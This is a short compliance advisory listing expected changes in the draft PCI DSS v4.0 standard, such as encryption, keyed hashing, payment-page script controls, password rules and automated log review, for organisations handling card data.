In March 2022, the Payment Card Industry Security Standard Council (PCI SSC) released its initial draft v4.0 of the standard. Based on the initial draft release, the following critical changes are assumed to be incorporated into the new version of the PCI standard:
- For merchants, sensitive authentication data (SAD), if stored outside volatile memory, must be encrypted using strong cryptography prior to authorization. Once authorization is achieved, said data must be securely deleted.
- When using remote access technologies, technical safeguards must be in place to limit the movement of cardholder data (i.e., copying and/or relocation of data).
- If the company stores hashed PAN within their systems, they must use keyed cryptographic hashing processes (utilizing a cryptographic key and hash function) to prevent brute force attacks.
- The use of disk-level encryption to render card data unreadable must be limited to portable media storage devices.
- Different cryptographic keys must be used between the production and test environments (service providers must document their cryptographic architectures to prove separation).
- Certificates used to safeguard PAN during transmission over open, public networks must be confirmed as valid and cannot be expired or revoked.
- An inventory of trusted keys and certificates used to protect PAN data during transmission must be maintained.
- For public-facing web applications, an automated technical solution must be deployed that continually detects and prevents web-based attacks (no longer allowing for periodic manual reviews).
- All payment page scripts that are loaded and executed in the consumer’s browser must be managed as follows:
- A method is implemented to confirm that each script is authorized.
- A method is implemented to assure the integrity of each script.
- An inventory of all scripts is maintained with written justification as to why each is necessary
- Merchants must implement controls to detect and address phishing attacks.
- Removable media must be scanned when inserted or connected to the network with anti-malware solutions.
- Merchants must review all user accounts (including system and application accounts) and related access privileges at least every six months.
- Password minimum length must be 12 characters unless system limitations exist.
- Credentials used by applications and system accounts cannot be hard coded into scripts, source code, or executable code.
- Passwords/passphrases for application and system accounts must be changed periodically.
- Passwords/passphrases for application and system accounts must meet complexity requirements based on risk.
- Automated mechanisms for review of audit logs must be required (manual reviews will not be accepted).
- Authenticated internal vulnerability scans must be required for all internal devices within the CDE.
- Change and tamper detection mechanisms must be implemented to identify unauthorized changes on payment pages.
- Organizations must implement response procedures to be initiated upon detection of cleartext PAN data found outside of the CDE.
- Organizations must implement response procedures to be initiated upon the detection of attempts to remove cleartext PAN from the CDE via an unauthorized channel, method, or process.
While the items listed above are not a complete list of all changes, they can pose a significant cost to many organizations. For additional information, please refer to the PCI SSC website at https://www.pcisecuritystandards.org/.